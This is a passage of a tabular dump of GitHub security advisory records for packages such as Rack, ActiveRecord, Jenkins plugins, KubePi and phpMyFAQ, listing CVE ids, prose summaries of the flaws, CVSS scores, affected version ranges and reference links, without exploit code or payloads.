namespace of this custom resource is still under the current user's control and may have permission to correct it. ### PoC disable by publish ### Impact + sealos public cloud user + CWE-287 Improper Authentication","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/labring/sealos'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/labring/sealos/security/advisories/GHSA-vpxf-q44g-w34w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36815'}, {'type': 'PACKAGE', 'url': 'https://github.com/labring/sealos'}]","{'cwe_ids': ['CWE-287', 'CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:36:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-c6fv-3jm9-6r8f,2023-06-09T16:52:12Z,2023-06-03T09:30:16Z,,['CVE-2023-3083'],TeamPass vulnerable to stored Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3083'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/79731553fa305d45dabb7a227f3074d56d7c94c1'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c6b29e46-02e0-43ad-920f-28ac482ea2ab'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:05:23Z', 'nvd_published_at': None}" 1.4.0,GHSA-6449-vf6p-9hfp,2023-01-24T18:05:48Z,2023-01-16T00:30:24Z,,['CVE-2023-0312'],thorsten/phpmyfaq is vulnerable to cross-site scripting (XSS),Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.10.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0312'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/65d419ca04111ee2612ae81cdd59753654cfe18a'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/f50ec8d1-cd60-4c2d-9ab8-3711870d83b9'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-19T11:47:51Z', 'nvd_published_at': '2023-01-15T22:15:00Z'}" 1.4.0,GHSA-rw83-v3pw-m362,2023-02-07T23:25:27Z,2023-01-30T06:30:27Z,2023-02-01T20:04:51Z,[],Withdrawn: safeurl-python contains Server-Side Request Forgery,"## Withdrawn This advisory has been withdrawn as a duplicate of [GHSA-jgh8-vchw-q3g7](https://github.com/advisories/GHSA-jgh8-vchw-q3g7). ## Original Description isInList in the safeurl-python package before 1.2 for Python has an insufficiently restrictive regular expression for external domains, leading to SSRF.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'safeurl-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/IncludeSecurity/safeurl-python/security/advisories/GHSA-jgh8-vchw-q3g7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24622'}, {'type': 'PACKAGE', 'url': 'https://github.com/IncludeSecurity/safeurl-python'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T20:04:51Z', 'nvd_published_at': '2023-01-30T05:15:00Z'}" 1.4.0,GHSA-w7w4-qjgg-372x,2023-02-07T21:22:10Z,2023-01-30T00:30:35Z,,['CVE-2023-0566'],Froxlor contains Static Code Injection,Static Code Injection in GitHub repository froxlor/froxlor prior to 2.0.10.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0566'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/bd5b99dc1c06f594b9563d459a50bf3b32504876'}, {'type': 'PACKAGE', 'url': 'https://github.com/Froxlor/Froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/8339e4f1-d430-4845-81b5-36dd9fcdac49'}]","{'cwe_ids': ['CWE-79', 'CWE-96'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T01:38:29Z', 'nvd_published_at': '2023-01-29T22:15:00Z'}" 1.4.0,GHSA-8r5j-22j5-w4cm,2023-02-08T17:57:31Z,2023-01-20T18:30:22Z,,['CVE-2021-26642'],XpressEngine vulnerable to Unrestricted Upload of File with Dangerous Type,"When uploading an image file to a bulletin board developed with XpressEngine, a vulnerability in which an arbitrary file can be uploaded due to insufficient verification of the file. A remote attacker can use this vulnerability to execute arbitrary code on the server where the bulletin board is running.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'xpressengine/xpressengine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26642'}, {'type': 'WEB', 'url': 'https://github.com/xpressengine/xpressengine/issues/1366'}, {'type': 'WEB', 'url': 'https://boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=67125'}]","{'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T17:57:31Z', 'nvd_published_at': '2023-01-20T17:15:00Z'}" 1.4.0,GHSA-3hc7-2xcc-7p8f,2023-01-12T23:44:02Z,2023-01-07T21:30:40Z,,['CVE-2020-36645'],Squalor SQL Injection vulnerability,"A vulnerability, which was classified as critical, was found in square squalor. This affects an unknown part. The manipulation leads to sql injection. Upgrading to version v0.0.0 is able to address this issue. The name of the patch is f6f0a47cc344711042eb0970cb423e6950ba3f93. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217623.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/square/squalor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36645'}, {'type': 'WEB', 'url': 'https://github.com/square/squalor/pull/76'}, {'type': 'WEB', 'url': 'https://github.com/square/squalor/commit/f6f0a47cc344711042eb0970cb423e6950ba3f93'}, {'type': 'PACKAGE', 'url': 'https://github.com/square/squalor'}, {'type': 'WEB', 'url': 'https://github.com/square/squalor/releases/tag/v0.0.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217623'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217623'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-12T23:44:02Z', 'nvd_published_at': '2023-01-07T19:15:00Z'}" 1.4.0,GHSA-9f2c-xxfm-32mj,2023-01-11T18:58:40Z,2023-01-11T06:30:20Z,2023-01-11T18:58:40Z,[],Duplicate of GHSA-4xh4-v2pq-jvhm,"## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of [GHSA-4xh4-v2pq-jvhm](https://github.com/advisories/GHSA-4xh4-v2pq-jvhm). This link is maintained to preserve external references. ## Original Description The personnummer implementation before 3.0.3 for Dart mishandles numbers in which the last four digits match the ^000[0-9]$ regular expression.",[],"[{'package': {'ecosystem': 'Pub', 'name': 'personnummer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/personnummer/dart/security/advisories/GHSA-4xh4-v2pq-jvhm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22963'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-4xh4-v2pq-jvhm'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-01-11T18:58:40Z', 'nvd_published_at': '2023-01-11T06:15:00Z'}" 1.4.0,GHSA-f976-24hc-mjvr,2023-01-27T01:02:10Z,2023-01-26T21:30:18Z,,['CVE-2023-24444'],Session fixation vulnerability in Jenkins OpenID Plugin ,Jenkins OpenID Plugin 2.4 and earlier does not invalidate the previous session on login.,[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:openid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24444'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2996'}]","{'cwe_ids': ['CWE-384'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:02:10Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-rqv2-275x-2jq5,2023-02-10T00:21:49Z,2023-01-18T18:19:21Z,,['CVE-2022-44572'],Denial of service via multipart parsing in Rack,"There is a denial of service vulnerability in the multipart parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2022-44572. Versions Affected: >= 2.0.0 Not affected: None. Fixed Versions: 2.0.9.2, 2.1.4.2, 2.2.6.1, 3.0.0.1 Impact Carefully crafted input can cause RFC2183 multipart boundary parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any applications that parse multipart posts using Rack (virtually all Rails applications) are impacted. Releases The fixed releases are available at the normal locations. Workarounds There are no feasible workarounds for this issue. Patches To aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. 2-0-Forbid-control-characters-in-attributes.patch - Patch for 2.0 series 2-1-Forbid-control-characters-in-attributes.patch - Patch for 2.1 series 2-2-Forbid-control-characters-in-attributes.patch - Patch for 2.2 series 3-0-Forbid-control-characters-in-attributes.patch - Patch for 3.0 series ",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'rack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.9.2'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0.0'}, {'fixed': '2.1.4.2'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0.0'}, {'fixed': '2.2.6.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0.0'}, {'fixed': '3.0.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-44572'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1639882'}, {'type': 'PACKAGE', 'url': 'https://github.com/rack/rack'}, {'type': 'WEB', 'url': 'https://github.com/rack/rack/releases/tag/v3.0.4.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2022-44572.yml'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-01-18T18:19:21Z', 'nvd_published_at': '2023-02-09T20:15:00Z'}" 1.4.0,GHSA-vxmh-p52j-h33m,2023-02-03T20:46:07Z,2023-01-26T21:30:18Z,,['CVE-2023-24424'],Session fixation vulnerability in Jenkins OpenId Connect Authentication Plugin ,Jenkins OpenId Connect Authentication Plugin 2.4 and earlier does not invalidate the previous session on login.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:oic-auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24424'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2978'}]","{'cwe_ids': ['CWE-384'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:06:14Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-8hcf-2m4v-f2rq,2023-01-24T20:29:47Z,2023-01-16T12:30:18Z,,['CVE-2016-15020'],SQL Injection in liftkit/database,A vulnerability was found in liftkit database up to 2.13.1. It has been classified as critical. This affects the function processOrderBy of the file src/Query/Query.php. The manipulation leads to sql injection. Upgrading to version 2.13.2 is able to address this issue. The name of the patch is 42ec8f2b22e0b0b98fb5b4444ed451c1b21d125a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-218391.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'liftkit/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.13.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-15020'}, {'type': 'WEB', 'url': 'https://github.com/liftkit/database/commit/42ec8f2b22e0b0b98fb5b4444ed451c1b21d125a'}, {'type': 'PACKAGE', 'url': 'https://github.com/liftkit/database'}, {'type': 'WEB', 'url': 'https://github.com/liftkit/database/releases/tag/v2.13.2'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.218391'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.218391'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-24T20:29:47Z', 'nvd_published_at': '2023-01-16T11:15:00Z'}" 1.4.0,GHSA-7mc4-jp4f-v2j2,2023-01-25T22:03:13Z,2023-01-14T09:30:23Z,,['CVE-2023-0298'],Improper Authorization in grumpydictator/firefly-iii,Improper Authorization in GitHub repository firefly-iii/firefly-iii prior to 5.8.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0298'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/db0500dcf0d4f1990fc7a377ef0d56c3884fcaa4'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/9689052c-c1d7-4aae-aa08-346c9b6e04ed'}]","{'cwe_ids': ['CWE-285', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-25T22:03:13Z', 'nvd_published_at': '2023-01-14T08:15:00Z'}" 1.4.0,GHSA-cxvp-3frm-3876,2023-01-24T18:52:56Z,2023-01-16T12:30:18Z,,['CVE-2022-41703'],Apache Superset's SQL Alchemy connector vulnerable to SQL Injection,"A vulnerability in the SQL Alchemy connector of Apache Superset allows an authenticated user with read access to a specific database to add subqueries to the WHERE and HAVING fields referencing tables on the same database that the user should not have access to, despite the user having the feature flag ""ALLOW_ADHOC_SUBQUERY"" disabled (default value). This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'versions': ['2.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-41703'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/g7jjw0okxjk5y57pbbxy19ydw42kqcos'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T23:17:15Z', 'nvd_published_at': '2023-01-16T11:15:00Z'}" 1.4.0,GHSA-579w-22j4-4749,2023-08-18T21:11:49Z,2023-01-18T18:21:12Z,,['CVE-2022-44566'],Denial of Service Vulnerability in ActiveRecord's PostgreSQL adapter,"There is a potential denial of service vulnerability present in ActiveRecord’s PostgreSQL adapter. This has been assigned the CVE identifier CVE-2022-44566. Versions Affected: All. Not affected: None. Fixed Versions: 5.2.8.15 (Rails LTS, which is a paid service and not part of the rubygem), 6.1.7.1, 7.0.4.1 Impact: In ActiveRecord <7.0.4.1 and <6.1.7.1, when a value outside the range for a 64bit signed integer is provided to the PostgreSQL connection adapter, it will treat the target column type as numeric. Comparing integer values against numeric values can result in a slow sequential scan resulting in potential Denial of Service. Releases The fixed releases are available at the normal locations. Workarounds Ensure that user supplied input which is provided to ActiveRecord clauses do not contain integers wider than a signed 64bit representation or floats. Patches To aid users who aren’t able to upgrade immediately we have provided patches for the supported release series in accordance with our maintenance policy 1 regarding security issues. They are in git-am format and consist of a single changeset. 6-1-Added-integer-width-check-to-PostgreSQL-Quoting.patch - Patch for 6.1 series 7-0-Added-integer-width-check-to-PostgreSQL-Quoting.patch - Patch for 7.0 series ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'activerecord'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.7.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'activerecord'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-44566'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/4f44aa9d514e701ada92b5cf08beccf566eeaebf'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/82bcdc011e2ff674e7dd8fd8cee3a831c908d29b'}, {'type': 'WEB', 'url': 'https://code.jeremyevans.net/2022-11-01-forcing-sequential-scans-on-postgresql.html'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2022-44566-possible-denial-of-service-vulnerability-in-activerecords-postgresql-adapter/82119'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v6.1.7.1'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v7.0.4.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activerecord/CVE-2022-44566.yml'}, {'type': 'WEB', 'url': 'https://makandracards.com/railslts/508019-rails-5-2-lts-changelog#section-jan-20th-2023-rails-version-5-2-8-15'}, {'type': 'WEB', 'url': 'https://rubyonrails.org/2023/1/17/Rails-Versions-6-0-6-1-6-1-7-1-7-0-4-1-have-been-released'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-18T18:21:12Z', 'nvd_published_at': '2023-02-09T20:15:00Z'}" 1.4.0,GHSA-v9mp-j8g7-2q6m,2023-02-08T21:51:47Z,2023-01-30T06:30:27Z,,['CVE-2023-24623'],Paranoidhttp Server-Side Request Forgery vulnerability,"Paranoidhttp before 0.3.0 allows SSRF because [::] is equivalent to the 127.0.0.1 address, but does not match the filter for private addresses.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hakobe/paranoidhttp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24623'}, {'type': 'WEB', 'url': 'https://github.com/hakobe/paranoidhttp/commit/07f671da14ce63a80f4e52432b32e8d178d75fd3'}, {'type': 'PACKAGE', 'url': 'https://github.com/hakobe/paranoidhttp'}, {'type': 'WEB', 'url': 'https://github.com/hakobe/paranoidhttp/blob/master/CHANGELOG.md#v030-2023-01-19'}, {'type': 'WEB', 'url': 'https://github.com/hakobe/paranoidhttp/compare/v0.2.0...v0.3.0'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1526'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T21:51:47Z', 'nvd_published_at': '2023-01-30T05:15:00Z'}" 1.4.0,GHSA-jmj6-p2j9-68cp,2023-01-25T21:37:25Z,2023-01-13T06:30:22Z,,['CVE-2022-3143'],Wildfly-elytron possibly vulnerable to timing attacks via use of unsafe comparator,"wildfly-elytron: possible timing attacks via use of unsafe comparator. A flaw was found in Wildfly-elytron. Wildfly-elytron uses `java.util.Arrays.equals` in several places, which is unsafe and vulnerable to timing attacks. To compare values securely, use `java.security.MessageDigest.isEqual` instead. This flaw allows an attacker to access secure information or impersonate an authed user.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.wildfly.security:wildfly-elytron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.15.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.wildfly.security:wildfly-elytron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.16.0.CR1'}, {'fixed': '1.20.3.Final'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-3143'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2022-3143'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2124682'}, {'type': 'PACKAGE', 'url': 'https://github.com/wildfly-security/wildfly-elytron'}]","{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-13T21:32:28Z', 'nvd_published_at': '2023-01-13T06:15:00Z'}" 1.4.0,GHSA-gqx8-hxmv-c4v4,2023-01-24T23:29:03Z,2023-01-09T21:56:09Z,,['CVE-2023-22478'],KubePi may allow unauthorized access to system API,"### Summary Unauthorized access refers to the ability to bypass the system's preset permission settings to access some API interfaces. The attack exploits a flaw in how online applications handle routing permissions. ### Affected Version <= v1.6.3 ### Patches The vulnerability has been fixed in v1.6.4. https://github.com/KubeOperator/KubePi/commit/0c6774bf5d9003ae4d60257a3f207c131ff4a6d6 ### Workarounds It is recommended to upgrade the version to v1.6.4. ### For more information If you have any questions or comments about this advisory, please open an issue. ### References https://github.com/KubeOperator/KubePi/releases/tag/v1.6.4","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/KubeOperator/kubepi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.6.3'}}]","[{'type': 'WEB', 'url': 'https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-gqx8-hxmv-c4v4'}, {'type': 'WEB', 'url': 'https://github.com/KubeOperator/KubePi/security/advisories/GHSA-gqx8-hxmv-c4v4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22478'}, {'type': 'WEB', 'url': 'https://github.com/KubeOperator/KubePi/commit/0c6774bf5d9003ae4d60257a3f207c131ff4a6d6'}, {'type': 'PACKAGE', 'url': 'https://github.com/KubeOperator/KubePi'}, {'type': 'WEB', 'url': 'https://github.com/KubeOperator/KubePi/releases/tag/v1.6.4'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T21:56:09Z', 'nvd_published_at': '2023-01-14T01:15:00Z'}" 1.4.0,GHSA-ggj9-6x8j-49w9,2023-01-10T00:40:56Z,2023-01-01T18:30:22Z,,['CVE-2010-10002'],SimpleSAMLphp simplesamlphp-module-openid,"A vulnerability classified as problematic has been found in SimpleSAMLphp simplesamlphp-module-openid. Affected is an unknown function of the file `templates/consumer.php` of the component `OpenID Handler`. The manipulation of the argument `AuthState` leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.0 can address this issue. The name of the patch is d652d41ccaf8c45d5707e741c0c5d82a2365a9a3. It is recommended to upgrade the affected component. VDB-217170 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'simplesamlphp/simplesamlphp-module-openid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2010-10002'}, {'type': 'WEB', 'url': 'https://github.com/simplesamlphp/simplesamlphp-module-openid/commit/d652d41ccaf8c45d5707e741c0c5d82a2365a9a3'}, {'type': 'PACKAGE', 'url': 'https://github.com/simplesamlphp/simplesamlphp-module-openid'}, {'type': 'WEB', 'url': 'https://github.com/simplesamlphp/simplesamlphp-module-openid/releases/tag/v1.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217170'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217170'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-10T00:40:56Z', 'nvd_published_at': '2023-01-01T17:15:00Z'}" 1.4.0,GHSA-76qj-9gwh-pvv3,2023-02-06T16:45:45Z,2023-01-26T21:30:19Z,,['CVE-2023-24422'],Sandbox bypass in Jenkins Script Security Plugin,"A sandbox bypass vulnerability involving map constructors in Jenkins Script Security Plugin 1228.vd93135a_2fb_25 and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:script-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1229.v4880b'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24422'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/script-security-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-3016'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:05:51Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-7m37-cx35-qgmr,2023-01-11T23:47:54Z,2023-01-04T18:31:00Z,,['CVE-2022-48216'],Uniswap Universal Router 